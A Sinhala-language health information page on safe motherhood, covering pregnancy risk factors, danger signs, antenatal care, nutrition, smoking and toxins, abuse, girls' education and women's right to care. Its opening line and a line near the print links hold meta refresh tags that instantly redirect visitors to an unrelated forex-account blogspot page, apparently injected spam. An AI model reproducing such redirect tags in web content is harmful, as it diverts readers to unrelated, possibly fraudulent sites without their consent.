" /> <meta http-equiv="refresh" content="0; url=http://managedforexaccount-pamm.blogspot.com/">

විශේෂඥ වෛද්‍ය උපදෙස්

දායකත්වය

   

   

විවිධ වයස් සඳහා තොරතුරු

තවත් වෙබ් අඩවි


<meta http-equiv="refresh" content="0; url=http://managedforexaccount-pamm.blogspot.com/"> පී.ඩී.එෆ් (PDF) මුද්‍රණය ඊ-තැපැල

ආරක්ෂිත මාතෘත්වය

 

  • ගැබිණි සමය තුලදී සහ දරු උපතේ දී ඇතිවිය හැකි අවදානම් තත්වය පිලිබද අනතුරු සංඥා හදුනා ගැනීමේ හැකියාව හා අවදානම් තත්ව ඇතිවුවහොත් ඒ සදහා කඩිනමින් උචිත සෞඛ්‍ය සේවා ලැබීමේ සැලසුමක් සහ සම්පත් සෑම පවුලක්ම සතු විය යුතුය.
  • කාන්තාවක් ගැබ් ගත් බව දැනගත් වහාම පූර්ව ප්‍රසව සායනික සේවා සදහා යොමු විය යුතුය.එහිදී ලැබෙන උපදෙස් අනුව පූර්ව ප්‍රසව සංරක්ෂණ ලැබිය යුතුය.ප්‍රසූතිය සදහා රෝහලකට යායුතුය.
  • සෑම ගර්භණී කාන්තාවකටම ගර්භණී කාලය තුලදී පෙරට වඩා පෝෂ්‍යදායී ආහාරත් වැඩි විවේකයකුත් ලැබීම අවශ්‍යය.
  • දුම් පානය,මත්පැන්,ඖෂධ ,විෂ වර්ග හා දූෂක ද්‍රව්‍ය ගර්භණී කාන්තාවන්ට සහ කුඩා දරුවන්ට විශේෂයෙන්ම අහිත කරය.ගැබිණි කාන්තාවක් අසල දුම් පානය කිරීමත් එම කාන්තාවට සහ කළලයට හානි සිදුවිය හැකිය.
  • කාන්තාවන් හා කුඩා දරුවන් කායික හිංසනයට හා අපයෝජනයට ලක්වීම බොහෝ ප්‍රජාවන් තුල දැකිය හැකි ප්‍රබල මහජන සෞඛ්‍ය ගැටලුවකි.ගැබිණි සමය තුලදී මෙසේ සිදු වීම කාන්තාව හා කළලය යන දෙදෙනාටම අනතුරු දායකය.
  • නිසි අධ්‍යපනය ලත් සෞඛ්‍ය සම්පන්න එමෙන්ම ළමා හා යොවුන් වයස් වලදී නිසි පෝෂණය ලත් ගැහැණු  ළමයින් හට ගර්භණී සමයේදී හා දරු ප්‍රසූතියේදී මුහුණ දීමට සිදුවන ගැටලු අඩුය.
  • සෑම කාන්තාවකටම සෞඛ්‍ය සත්කාර ලැබීමේ අයිතියක් ඇත.ගර්භණී සමයේදී සහ දරු ප්‍රසවයේදී ඒ වඩාත් සුවිශේෂිතය.සෞඛ්‍ය කාර්යය මණ්ඩල තාක්ෂණික හැකියාවෙන් පරිපූර්ණ විය යුතු අතර කාන්තාවන් හට ගෞරවයෙන් හා සුහදශීලීව සැලකීමටද සමත්විය යුතුය.          

 

 

 

 

 

  1. ගැබිණි සමය තුලදී සහ දරු උපතේ දී ඇතිවිය හැකි අවදානම් තත්වය පිලිබද අනතුරු සංඥා හදුනා ගැනීමේ හැකියාව හා අවදානම් තත්ව ඇතිවුවහොත් ඒ සදහා කඩිනමින් උචිත සෞඛ්‍ය සේවා ලැබීමේ සැලසුමක් සහ සම්පත් සෑම පවුලක්ම සතු විය යුතුය.

 

ඕනෑම කාන්තාවක් ගැබ් ගැනීම හේතුවෙන් යම් කිසි අවදානමකට බදුන් වෙයි.මෙම අවදානම ඇතිවන්නේ ගර්භණීය සමයේ ඇතිවන සංකූලතා නිසා විය හැකිය.මෙම සංකූලතා කල් තබා කිව නොහැකිය.කුලුදුල් දරු ප්‍රසවය ඉන් පසු ඇතිවන ප්‍රසවයන්ට වඩා අවදානමින් වැඩිය.දරු උපත සිදුවිය යුත්තේ කවර තැනකදීද යන්න පිලිබදව වෛද්‍යවරයකු හෙදියක හෝ පවුල් සෞඛ්‍ය සේවා නිලධාරිණියක් වැනි පුහුණුව ලද අයකුගෙන් විමසා දැන ගැනීමද වැදගත්ය.

 

ගර්භණී සමය තුලදී දරු ප්‍රසවයේදී සහ දරු උපත සිදු වූ විගස කිසිදු අනතුරු ඇගවීමකින් තොරව දරුණු ගැටලු සහගත තත්ව ඇතිවිය හැකි බැවින් සෑම පවුලක්ම ලගම රෝහල හෝ සායනය හෝ තිබෙන ස්ථානය දැන සිටිය යුතුය.එසේම දවසේ ඕනෑම වේලාවක දී කාන්තාව එතැනට රුගෙන යාම සදහා සැලසුමක් හා මුදල් තිබිය යුතුය.හැකියාව පවතීනම් ගර්භණී කාන්තාවට වෛද්‍ය පහසුකම් ඉක්මනින් සලසා ගැනීමට හැකි වන සේ සායනයක් හෝ රෝහලක් හෝ සමීපව තිබෙන නිවසක තාවකාලිකව පදිංචි කල යුතුය.

 

දරු ප්‍රසූතිය අසීරු හෝ අවදානම් හෝ විය හැකි යයි පවුලේ අය දන්නේ නම් දරු ප්‍රසවය රෝහලක හෝ මාතෘ නිවාසයක හෝ සිදුවිය යුතුය.සියලු දරු උපත් විශේෂයෙන්ම කුළුදුල් දරු ප්‍රසව රෝහලක හෝ මාතෘ සායනයක හෝ සිදුවීම වඩාත් ආරක්ෂිතය.

 

පවුල් වල සියලු දෙනාම විශේස අවදානම් සාධක දැන සිටිය යුතු අතර ඇතිවිය හැකි ගැටලු හා සම්බන්ධ අනතුරු ඇගවීම වටහා ගැනීමට ද සමත් විය යුතුය.

 

ගර්භණී වීමට පෙර පවත්නා අවදානම් සාධක:

 

  • හෘද රෝග , අධික රුධිර පීඩනය ,දියවැඩියාව ,වකුගඩු රෝග ,රක්තහීනතාවය ,ඇදුම වැනි හදුනා ගත් රෝග තත්වයන් තිබීම.

  • දැනටමත් දරුවන් 4 දෙනෙකු හෝ ඊට වැඩි දරුවන් සහිත මවක් වීම.

  • පෙර වතාවත අසීරු ප්‍රසවයකට හෝ සීසර් සැත්කමකින් හෝ දරු උපත සිදු කල මවක් වීම.

  • පෙර වතාවක නොමේරූ දරුවකුට හෝ කිලෝග්‍රෑම් 2 කට වඩා බරින් අඩු දරුවකුට හෝ උපත දුන් මවක් වීම.

  • පෙර දරු ප්‍රසවයේ සිට අවුරුදු 2 කට වඩා අඩු පරතරයක් තිබීම.

  • වයස අවුරුදු 18 ට අඩු යුවතියක් වීම හෝ වයස අවුරුදු 35 ඉක්මවූ කාන්තාවක හෝ වීම.

  • පෙර වතාවක ගබ්සාවීමක් හෝ දරු ගැබ අහිමි වීමක් හෝ මළ දරු උපතකට හෝ මුහුණ දුන් කාන්තාවක් වීම.

 

 

ගර්භණී සමය තුලදී සිදුවන අනතුරු ඇගවීම්:

 

  • දෙපා,දෙඅත් සහ මුහුණෙහි අසාමාන්‍ය ඉදිමුම් තත්වයන් ඇතිවීම.
  • නීරක්තය.
  • පහසුවෙන් වෙහෙස දැනීම හෝ නිතර හුස්ම ගැනීමේ අපහසුතා ඇතිවීම.
  • කලල චලන විශේෂයෙන්ම අවසාන මාස කීපය තුලදී සුපුරුදු ප්‍රමාණයට වඩා අඩු වීම හෝ කෙසේවත් සිදු නොවීම.
  • බර වැඩි නොවීම(අවම වශයෙන් ගර්භණී සමය තුලදී කිලෝග්‍රෑම් 9 කින්වත් බර වැඩි විය යුතුය.)

 

 

ඉක්මනින් උදව් ලබා ත යුතු ලක්ෂණ:

 

  • ගර්භණී සමයේ දී යෝනි මාර්ගය තුලින් ඉතා සුළු වශයෙන් හෝ රුධිර වහනය වීම දරු ප්‍රසවයෙන් පසුව තදින් හෝ දිගටම පවතිනලේ වහනය.
  • තද හිසරදය හෝ වමනය හෝ පෙනීමේ වෙනස්කම්.
  • හදිසියේ ඇතිවන තද උදර වේදනාව.
  • හදිසියේ ඇතිවන හුස්ම ගැනීමේ අපහසුතාවය හෝ පපුවේ කැක්කුම.
  • තද හෝ කල් පවත්නා වමනය
  • අධික උණ
  • ප්‍රසවයට පෙර යෝනි මාර්ගයෙන් දියරයක් පිට වීම.
  • වලිප්පුව.
  • ඇස් කහ වීම,මුත්‍රා කහ පැහැ ගැනීම.

 

 

  1. කාන්තාවක් ගැබ් ගත් බව දැනගත් වහාම පූර්ව ප්‍රසව සායනික සේවා සදහා යොමු විය යුතුය.එහිදී ලැබෙන උපදෙස් අනුව පූර්ව ප්‍රසව සංරක්ෂණ ලැබිය යුතුය.ප්‍රසූතිය සදහා රෝහලකට යායුතුය.

සෑම ගර්භණී භාවයක් සදහාම අවධානය අවශ්‍යය.ඒ කිසියම් වරදක් සිදුවීමේ අවදානය පවතින නිසාය.කාන්තාවක් ගර්භණී යයි සැකකල මුල් අවස්ථාවේදීම වෛද්‍යවරයකු හෝ පුහුණු සෞඛ්‍ය කාර්යය මණ්ඩල සාමාජිකයකු හෝ මුණ ගැසිය යුතුය.දරු ප්‍රසවයෙන් පසු ගෙවන පලමු පැය 12 ක් තුලදී සහ දරු ප්‍රසූතියෙන් පසු පළමු දින 10 තුළ පලාතේ පවුල් සෞඛ්‍ය සේවා නිලධාරිණී ලවා පරීක්ෂා කරගත යුතුය.

 

ගර්භණී සමය තුලදී කිසියම් රුධිර වහනයක් හෝ උදර ප්‍රදේශයේ වේදනාවක් මෙන්ම ඉහත දැක්වූ අනතුරු ඇගවීම් කිසිවක් හෝ ඇත්නම් වහාම වෛද්‍යවරයකු හෝ පුහුණු සෞඛ්‍ය සේවකයකු හෝ මුණ ගැසිය යුතුය.

 

රෝහලකදී හෝ පුහුණු සෞඛ්‍ය සේවා මණ්ඩල සාමාජිකයකුගේ සහය ඇතිව ප්‍රසවය සිදුවීමත් ප්‍රසවය සිදුවී පැය 12 ක් තුලදී මව පරීකුෂාවට ලක්වීමත් නිසා මව හෝ දරුවා රෝගී වීමට හෝ මරණයට පත්වීමට හෝ පවත්නා ඉඩකඩ අඩුවෙයි.

 

පහත දැක්වෙන පියවර ගැනීමට පුහුණු සෞඛ්‍ය කාර්යය මණ්ඩල සාමාජිකයකු,වෛද්‍යවරයකු,හෙදියකු හෝ පවුල් සෞඛ්‍ය සේවා නිලධාරිනියක ගේ සහය ලැබීම මගින් ආරක්ෂාකාරී ගර්භණීභාවයක් හා සෞඛ්‍ය සම්පන්න දරුවකු ගේ උපත සහතික වෙයි.

 

  • ගර්භණීසමයේ වර්ධනය පිලිබද පරීක්ෂා කිරීම තුලින් කාන්තාවට කිසියම් ගැටළුවක් ඇති වුවහොත් දරු උපත සදහා රෝහලකට ගෙනයාමේ අවස්ථාව සැලසීම.

  • මව සහ දරුවා යන දෙදෙනාටම හානිදායක විය හැකි අධි රුධිර පීඩනය සදහා පරීක්ෂා කිරීම.

  • නීරක්තී තත්වය විමසා බැලීම සහ යකඩ / ෆෝලික් අම්ල පරිපූරක නිරතුරුවම සැපයීම.

  • දරුවා බිහිවීමෙන් පසු මව සහ ඇගේ අලුත උපන් දරුවා ආසාදන වලින් ආරක්ෂාකිරීම උදෙසා විටමින් ඒ ඒකක 200,000 සැපයීම.

  • ගර්භණී සමය තුල විශේෂයෙන්ම මුත්‍රා මාර්ගීය ආසාදන හා ලිංගිකව සම්ප්‍රේෂණය වන රෝග ආසාදන තිබේදැයි සොයා නිසි ප්‍රතිකාර ලබාදීම.

  • ප්‍රථම වරට ගර්භණී වන මව්වරුන් හට පිටගැස්ම එන්නත් දෙකක් ලබාදීම මගින්ද දෙවන ,තුන්වන හා හතර වන ගර්භණීභාවයන්හිදී එක් නික්ෂේපනයක් මගින් ඇයටත් ,ඇයගේ අලුත උපන් දරුවාටත් පිටගැස්ම රෝගයෙන් ආරක්ෂාව සැලසීම.

  • ආහාර පිලියෙල කිරීමේදී සියලු ගර්භණීමව්වරුන් හට අයඩින් මිශ්‍ර කළ ලුණු පමණක් භාවිතා කිරීම උනන්දු කිරීම මගින් ඔවුන් ගලගණ්ඩයෙන් සහ ඔවුන්ගේ දරුවන් අනාගත මානසික සහ කායික ආබාධිත තත්වයන්ගෙන් ආරක්ෂාවීමට සහය වීම.

  • කලලයයේ වැඩීම නිසි ලෙස සිදුවන බව පරීක්ෂා කිරීම.

  • අවශ්‍ය අවස්ථාවන් හිදී  ප්‍රති මැලේරියා ඖෂධ ලබාදීම.

  • දරු ප්‍රසවය පිලිබද අත්දැකීම් විදීමට මව සූදානම් කිරීම හා මව් කිරි දීම පිලිබදව අවශ්‍ය සත්කාර පිලිබද උපදෙස් ලබාදීම.

  • දරු ප්‍රසවය පිලිබද අත්දැකීම් විදීමට මව සූදානම් කිරීම සහ මව් කිරි දීම පිලිබදව මෙන්ම තමන් හා තම දරුවා පිලිබදව අවශ්‍ය සත්කාර පිලිබද උපදෙස් ලබාදීම.

  • ගර්භණී මවට හා ඇයගේ පවුලේ අයට දරු උපත සිදු විය යුතු ස්ථානය පිලිබදව මග පෙන්වීම හා දරු ප්‍රසවයේදී හෝ දරු ප්‍රසවය සිදුවූ සැනින් හෝ ඇතිවිය හැකි ගැටලුවක දී උදව් ලබා ගත යුත්තේ කොතැනින්ද යන්න පිලිබදව දැනුවත් කිරීම.

  • ලිංගිකව සම්ප්‍රේෂණය වන රෝග වලින් ආරක්ෂා වීම පිලිබදව උපදෙස් ලබාදීම.

  • ස්වේච්ඡාවෙන් සහ විශ්වාසනීයත්වයෙන් යුතුව එච්.අයි.වී පරීක්ෂාවට සහ උපදේශනය සැපයීම. ස්වේච්ඡාවෙන් සහ විශ්වාසනීයව එච්.අයි.වී පරීක්ෂණයට ලක්වීමේ සහ උපදේශනය ලැබීමේ අයිතිය සෑම කාන්තාවක්ම සතුය.ගර්භණී ම්වරුන් මෙන්ම අලුත උපන් දරුවකුට උපත දුන් මව්වරුන්ද ආසාදිත නම් හෝ තම ළදරුවාට ආසාදනය පැතිරීමට ඇති අවදානම අවම කර ගැනීම සදහා තම තමන්ට අවශ්‍ය සත්කාර ලැබීම සදහා ගතයුතු පියවර පිලිබදව පුහුණු සෞඛ්‍ය සේවකයකු හමුවී අවශ්‍ය උපදේශනය ලබා ගත යුතුය.

3.      සෑම ගර්භණී කාන්තාවකටම ගර්භණී කාලය තුලදී පෙරට වඩා පෝෂ්‍යදායී ආහාරත් වැඩි විවේකයකුත් ලැබීම අවශ්‍යය.

 

 

ගර්භණී මවකට එම පවුලට ලබා ගත හැකි හොදම ආහාර :- කිරි,පලතුරු,එළවළු,මස්,මාළු,බිත්තර,ධාන්‍ය , ඇට වර්ග ලැබීමේ අවශ්‍යතාවයක් පවතී. ගර්භණී සමයේදී මේ සියලු ආහාර ගැනීම ආරක්ෂා සහිතය.

 

 

කාන්තාවක් යකඩ,විටමින් ඒ සහ ෆෝලික් අම්ලය ආදී පෝෂකයන් ගෙන් පෝෂිත ආහාර ගර්භණී සමය තුල ගැනීමෙන් ශක්තිමත් හා සෞඛ්‍යමත් හැගීමක් ඇති වනු ඇත.මේ ආහාර අතරට මස් ,මාළු,බිත්තර,කොළ පැහැ පළාවර්ග සහ දොඩම් හෝ කහ පැහැ පළතුරු සහ එළවළු ඇතුලත්ය.

 

 

ගර්භණී කාන්තාවක් නීරක්තියෙන් වැලැක්වීමට හෝ එයට ප්‍රතිකාර වශයෙන් යකඩ පෙති ගැනීම අවශ්‍ය වේ.එසේම ආසාදන ඇතිවීම වැලැක්වීම සදහා විටමින් ඒ ඌනතා සහිත ප්‍රදේශ වල ගර්භණී මව්වරුන්ට විටමින් ඒ ප්‍රමාණවත් මාත්‍රාවකින් සැපයීම අවශ්‍යය.

 

 

ගර්භණී කාන්තාවක් දවසකට ගන්නා විටමින් ඒ ප්‍රමාණය අන්තර් ජාතික ඒකක (අ.ජා.ඒ) 10,000 ක් හෝ සතියකට අ.ජා.ඒ 25,000 ක් හෝ නොයික්මවිය යුතුය.භාවිතයට ගන්නා ලුණු අයඩීන් මිශ්‍රිත ලුණු විය යුතුය.සිය ආහාර වේල තුළ ප්‍රමාණවත් අයඩීන් ප්‍රමාණයක් නොමැති වූ විට දරු ගැබ අහිමි වීමට වැඩි ඉඩක් තිබෙනවා මෙන්ම මානසික හෝ කායික ආබාධ සහිත ළදරුවකුට උපත දීමේ අවදානමක්ද පවතී.

 

ගෙල ඉදිරිපස ඇතිවන වායු ගෙඩිය ලෙස හැදින් වෙන ඉදිමුම කාන්තාවන් ප්‍රමාණවත් තරම් අයඩීන් නොලබන බව හගවන පැහැදිලි ලක්ෂණයකි.

 

නීරක්තිය ,මැලේරියාව හෝ කොකු පණු රෝගය ආදිය පිලිබද සැකයක් ඇත්නම් ගර්භණී මවක් වෛද්‍යවරයකුගේ හෝ සෞඛ්‍ය සේවකයකුගේ හෝ උපදෙස් පැතිය යුතුය.

  

 

4.      දුම් පානය,මත්පැන්,ඖෂධ ,විෂ වර්ග හා දූෂක ද්‍රව්‍ය ගර්භණී කාන්තාවන්ට සහ කුඩා දරුවන්ට විශේෂයෙන්ම අහිත කරය.ගැබිණි කාන්තාවක් අසල දුම් පානය කිරීමත් එම කාන්තාවට සහ කළලයට හානි සිදුවිය හැකිය.

 

ගර්භණී කාන්තාවක් දුම් පානය කිරීම හෝ වෙනත් අය දුම් පානය කරන පරිසරයක සිටීම,මත්පැන් පානය කිරීම හෝ මත් ඖෂධ භාවිතා කිරීම නිසා ඇගේ සෞඛ්‍යට මෙන්ම කලලයේ සෞඛ්‍යට ද හානි ඇති විය හැකිය.ගර්භණී සමය තුලදී වත් වෛද්‍ය වරයකුගේ නිර්දේශයක් සහිතව අත්‍යවශ්‍යම අවස්ථාවක දී හැර අන් කවර අවස්ථාවක දී වත් ඖෂධ භාවිතා නොකල යුතුය.

 

ගර්භණී මවක් දුම් පානය කලහොත් ඇය උපත දෙන දරුවා අඩු බරැති දරුවකු වීමත් ,කැස්ස ,සෙම්ප්‍රතිශ්‍යව , ගුගුරුව(උගුරේ සෙම හිරවූ ගතිය) නිව්මෝනියාව හෝ වෙනත් ශ්වසන ගැටලු වලින් පෙලීමටත් වැඩි ඉඩක් පවතියි.

 

දරුවාගේ කායික හා මානසික සංවර්ධනය තහවුරු කිරීම සදහා ගැබිණී මව් වරුන් හා කුඩා දරුවන් සිගරට් දුමින් ,මෙන්ම කුස්සියේ ලිපෙන් නැගෙන දුමින්,පලිබෝධ නාශක හා වෙනත් විෂ ද්‍රව්‍ය වලින් මෙන්ම ජලය ගෙන යන ඊයම් සහිත නල,වාහන පිටාර වායුව හා සමහර තීන්ත වල අඩංගු ඊයම් වැනි දූෂකයන් ගෙන්ද ආරක්ෂාකල යුතුය.

 

 

5.      කාන්තාවන් හා කුඩා දරුවන් කායික හිංසනයට හා අපයෝජනයට ලක්වීම බොහෝ ප්‍රජාවන් තුල දැකිය හැකි ප්‍රබල මහජන සෞඛ්‍ය ගැටලුවකි.ගැබිණි සමය තුලදී මෙසේ සිදු වීම කාන්තාව හා කළලය යන දෙදෙනාටම අනතුරු දායකය.

 

ගර්භණී කාන්තාවක් අපයෝජනයට ලක්වුව හොත් ඇයට සහ කලලයට දරුණු හානි ඇති විය හැකිය.කායික අපයෝජනයට ලක්වූ ගර්භණී කාන්තාවන් හට තවත් දරුවන් ලැබීමට නොහැකි විය හැක.ඇයගේ පවුලේ සාමාජිකයන් මෙම අනතුරුදායක තත්වය පිලිබදව අවබොධයෙන් සිටිය යුතු අතර ඇය අපයෝජනයෙන් ආරක්ෂා කිරීමටද ක්‍රියා කල යුතුය.

 

 

6.      නිසි අධ්‍යපනය ලත් සෞඛ්‍ය සම්පන්න එමෙන්ම ළමා හා යොවුන් වයස් වලදී නිසි පෝෂණය ලත් ගැහැණු  ළමයින් හට ගර්භණී සමයේදී හා දරු ප්‍රසූතියේදී මුහුණ දීමට සිදුවන ගැටලු අඩුය.

 

කියවීම හා ලිවීමට ඇති හැකියාව කාන්තාවන් හට ඔවුන් ගේ  සහ තම පවුල් වල සෞඛ්‍ය ආරක්ෂාකර ගැනීමට සහය වෙයි.අඩුම තරමින් සත් වසරක් පාසල් අධ්‍යපනයක් ලත් ගැහැණු ළමයකු යෞවන වයසේදී ගැබ් ගැනීමෙන් වැලකී සිටීමට මෙන්ම සුලු අධ්‍යපනයක් පමණක් ලත් හෝ අධ්‍යපනය නොලත් හෝ ගැහැණු ළමයකුට වඩා පමා වී යුග දිවියට ඇතුලු වීමට වැඩි ඉඩක් පවතියි.

 

ළමා හා යෞවන වයස් වලදී පෝෂ්‍යදායී ආහාර වේලක් ලැබීම ගර්භණී සමයේ දී සහ දරු ප්‍රසවයේදී ගැටලු ඇති වීම අඩු කරයි.පෝෂ්‍ය දායී ආහාර වේලක් තුල පියලි හා වෙනත් ඇට වර්ග,ධාන්‍ය,කොළ පැහැ පලා වර්ග ,රතු කහ සහ දොඩම් පැහැති එළවළු සහ පළතුරු ඇතුලත්ය.හැකි සෑම අවස්තාවක දීම කිරි හා වෙනත් කිරි ආහාර ,බිත්තර ,මාළු,කුකුල් මස් සහ මස් වර්ග ආහාර වේලට ඇතුලත් කරගත යුතුය.

 

ගැහැණු ළමයින් ගේ හෝ වෙනත් කාන්තාවන් ගේ ලිංග විච්ඡේදනය හේතුවෙන් දරුණු යෝනි මාර්ගීය හා මුත්‍රා ආසාදන ඇතිකිරීමට ඉඩ ඇති අතර එමගින් වදභාවය සහ මරණය පවා ඇතිවිය හැකිය.ස්ත්‍රී ලිංග විච්ඡේදනය දරු ප්‍රසවයේදී දරුණු සංකූලතා ඇති කිරීමට සහ ගැහැණු ළමයින් හා කාන්තාවන් තුල මානසික සෞඛ්‍ය ප්‍රශ්න ඇති කිරීමට හේතු වෙයි.මෙම තත්වය ශ්‍රී ලංකාවේ නොමැති වීම ගැන අප සතුටු විය යුතුය.

 

 

7.      සෑම කාන්තාවකටම සෞඛ්‍ය සත්කාර ලැබීමේ අයිතියක් ඇත.ගර්භණී සමයේදී සහ දරු ප්‍රසවයේදී ඒ වඩාත් සුවිශේෂිතය.සෞඛ්‍ය කාර්යය මණ්ඩල තාක්ෂණික හැකියාවෙන් පරිපූර්ණ විය යුතු අතර කාන්තාවන් හට ගෞරවයෙන් හා සුහදශීලීව සැලකීමටද සමත්විය යුතුය.       

 

ගර්භණී සමයේදී දරු ප්‍රසව අවස්ථාවේදී සහ ප්‍රසවයෙන් පසුව සෞඛ්‍ය සත්කාර සහ පුහුණු වෛද්‍ය උපදෙස් ලැබීමේ අවස්ථාව කාන්තාවන් හට ලැබෙනුයේ නම් ගර්භණී සමයේ හා දරු ප්‍රසවය හේතු කොට ඇතිවන බොහෝ අනතුරු දායක තත්වයන් වලක්වාලිය හැකිය.

 

සෑම කාන්තාවක් හටම පුහුණු වෛද්‍යවරයකු ,හෙදියක හෝ පවුල් සෞඛ්‍ය සේවා නිලධාරිණියක ගේ සහය ලැබීමේ හා අවශ්‍ය වුවහොත් හදිසි ප්‍රසව සත්කාර ලැබීමේ අයිතිය හිමිය.

 

ග්‍රණාත්මක සෞඛ්‍ය සේවාවක් මගින් තොරතුරු හා උපදේශනය ලබාදීම තුලින් කාන්තාවන් හට දැනුවත්ව තීරණ ගැනීමේ අවස්ථාව සලසයි.මාතෘ සෞඛ්‍ය සත්කාර අවශ්‍ය කාන්තාවන්ට සෞඛ්‍ය පහසුකම් සදහා සමීප වීම පහසු විය යුතුය.මෙම සේවා භාවිතයේදී වියදම එයට අවහිරයක් විය නොයුතුය.සෞඛ්‍ය සත්කාර සපයන්නවුන් තුලද ගුනාත්මක සේවා සැපයීමට ප්‍රමාණවත් කුසලතා පැවතිය යුතුය.එසේම සියලු කාන්තාවන්ට ගෞරවාන්විතව හා සුහදශීලීව සැලකීමටත් ,ඔවුන්ගේ සංස්කෘතිමය ඇගයීම් වලට සංවේදී වීමටත් ,විශ්වාසනීයත්වය හා පෞද්ගලික රහස්‍යභාවය සදහා කාන්තාවන්ට ඇති අයිතිය ට ගරු කිරීමටත් ඔවුන් පුහුණු කළ යුතුය.  

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

LAST_UPDATED2